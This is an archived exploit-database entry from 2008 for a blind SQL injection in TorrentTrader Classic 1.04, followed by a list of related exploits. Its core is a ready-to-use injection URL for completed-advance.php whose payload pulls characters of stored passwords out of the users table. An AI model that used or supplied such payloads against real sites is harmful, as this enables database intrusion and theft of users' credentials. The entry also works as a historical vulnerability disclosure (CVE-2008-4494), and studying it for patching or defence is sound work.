====================================================== ==> TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit ====================================================== ==> NamE : TorrentTrader Classic ==> version : 1.04 ==> Download : www.torrenttrader.org ====================================================== ==> AuThOr : BazOka-HaCkEr ==> EmaiL : x9j@HoTmaiL.Com ==> HomE : WwW.TrYaG.cc/cc ====================================================== ==> ExplO!te : ==> www.TarGeT.com/paTh/completed-advance.php?id=[SQL] ==> ExampLe : ==> www.TarGeT.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1) ====================================================== ==> GreeTz : ==> ll Abu-Mahdi ll FeezO ll Mr.SQL ll MoGaTiL ll Abo-Najm ll alra7el ll ====================================================== # milw0rm.com [2008-10-07]
Related Exploits
Trying to match CVEs (1): CVE-2008-4494Trying to match OSVDBs (1): 48975
Trying to match setup file: cb81e27d82d92b5ae5c62a063fc0342f
Other Possible E-DB Search Terms: TorrentTrader Classic 1.04, TorrentTrader Classic
Date | D | V | Title | Author |
---|---|---|---|---|
2007-10-08 |
![]() |
TorrentTrader Classic 1.07 - Multiple Vulnerabilities | HACKERS PAL | |
2009-06-15 |
![]() |
TorrentTrader Classic 1.09 - Multiple Vulnerabilities | waraxe | |
2008-05-31 |
![]() |
TorrentTrader Classic 1.x - 'scrape.php' SQL Injection | Charles Vaughn |